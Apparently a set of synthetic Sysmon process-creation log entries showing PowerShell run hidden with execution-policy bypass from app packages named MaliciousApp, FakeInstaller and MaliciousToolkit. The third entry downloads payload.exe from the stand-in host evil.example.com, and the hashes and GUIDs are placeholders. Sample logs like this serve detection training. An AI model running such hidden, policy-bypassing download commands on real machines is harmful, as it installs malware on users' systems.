EventID: 1
Version: 5
Level: 4
Task: 1
Opcode: 0
Keywords: 0x8000000000000000
EventRecordID: 123456
Channel: Microsoft-Windows-Sysmon/Operational
Computer: DESKTOP-ABC123.contoso.local
RuleName: -
UtcTime: 2023-06-22 15:23:45.123
ProcessGuid: {a1b2c3d4-e5f6-7890-1234-567890abcdef}
ProcessId: 4567
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\WindowsApps\MaliciousApp_1.0.0.0_x64__abcdefghijklm\Scripts\setup.ps1"
CurrentDirectory: C:\Program Files\WindowsApps\MaliciousApp_1.0.0.0_x64__abcdefghijklm\
User: DESKTOP-ABC123\User
LogonGuid: {a1b2c3d4-e5f6-7890-1234-abcdef123456}
LogonId: 0x12345
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=1A2B3C4D5E6F7A8B9C0D1E2F3A4B5C6D7E8F9A0B,MD5=1A2B3C4D5E6F7A8B9C0D1E2F3A4B5C6D,SHA256=1A2B3C4D5E6F7A8B9C0D1E2F3A4B5C6D7E8F9A0B1C2D3E4F5A6B7C8D9E0F1A2B
ParentProcessGuid: {a1b2c3d4-e5f6-7890-1234-fedcba098765}
ParentProcessId: 1234
ParentImage: C:\Program Files\WindowsApps\MaliciousApp_1.0.0.0_x64__abcdefghijklm\AI_STUBS\AiStubX64Elevated.exe
ParentCommandLine: "C:\Program Files\WindowsApps\MaliciousApp_1.0.0.0_x64__abcdefghijklm\AI_STUBS\AiStubX64Elevated.exe" -appid MaliciousApp -appdir "C:\Program Files\WindowsApps\MaliciousApp_1.0.0.0_x64__abcdefghijklm\"
ParentUser: DESKTOP-ABC123\User

EventID: 1
Version: 5
Level: 4
Task: 1
Opcode: 0
Keywords: 0x8000000000000000
EventRecordID: 123457
Channel: Microsoft-Windows-Sysmon/Operational
Computer: DESKTOP-ABC123.contoso.local
RuleName: -
UtcTime: 2023-06-22 15:24:12.456
ProcessGuid: {b2c3d4e5-f6a7-8901-2345-67890abcdef1}
ProcessId: 4568
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell.exe -WindowStyle Hidden -NonInteractive -ExecutionPolicy Bypass -file "C:\Program Files\WindowsApps\FakeInstaller_2.0.0.0_x86__zyxwvutsrqpon\Scripts\payload.ps1"
CurrentDirectory: C:\Program Files\WindowsApps\FakeInstaller_2.0.0.0_x86__zyxwvutsrqpon\
User: DESKTOP-ABC123\User
LogonGuid: {a1b2c3d4-e5f6-7890-1234-abcdef123456}
LogonId: 0x12345
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=2A3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B,MD5=2A3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D,SHA256=2A3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B2C3D4E5F6A7B8C9D0E1F2A3B
ParentProcessGuid: {b2c3d4e5-f6a7-8901-2345-67890abcdef0}
ParentProcessId: 1235
ParentImage: C:\Program Files\WindowsApps\FakeInstaller_2.0.0.0_x86__zyxwvutsrqpon\AI_STUBS\AiStubX86.exe
ParentCommandLine: "C:\Program Files\WindowsApps\FakeInstaller_2.0.0.0_x86__zyxwvutsrqpon\AI_STUBS\AiStubX86.exe" -appid FakeInstaller -appdir "C:\Program Files\WindowsApps\FakeInstaller_2.0.0.0_x86__zyxwvutsrqpon\"
ParentUser: DESKTOP-ABC123\User

EventID: 1
Version: 5
Level: 4
Task: 1
Opcode: 0
Keywords: 0x8000000000000000
EventRecordID: 123458
Channel: Microsoft-Windows-Sysmon/Operational
Computer: DESKTOP-DEF456.contoso.local
RuleName: -
UtcTime: 2023-06-22 15:25:23.789
ProcessGuid: {c3d4e5f6-a7b8-9012-3456-7890abcdef12}
ProcessId: 5678
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden C:\Program Files\WindowsApps\MaliciousToolkit_3.0.0.0_x64__nopqrstuvwxyz\Scripts\config.ps1 -action download -file http://evil.example.com/payload.exe
CurrentDirectory: C:\Program Files\WindowsApps\MaliciousToolkit_3.0.0.0_x64__nopqrstuvwxyz\
User: DESKTOP-DEF456\Admin
LogonGuid: {c3d4e5f6-a7b8-9012-3456-7890abcdef12}
LogonId: 0x67890
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B2C,MD5=3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E,SHA256=3B4C5D6E7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B2C3D4E5F6A7B8C9D0E1F2A3B4C
ParentProcessGuid: {c3d4e5f6-a7b8-9012-3456-7890abcdef11}
ParentProcessId: 2345
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\Windows\System32\cmd.exe /c start /b powershell -WindowStyle Hidden C:\Program Files\WindowsApps\MaliciousToolkit_3.0.0.0_x64__nopqrstuvwxyz\Scripts\config.ps1 -action download -file http://evil.example.com/payload.exe
ParentUser: DESKTOP-DEF456\Admin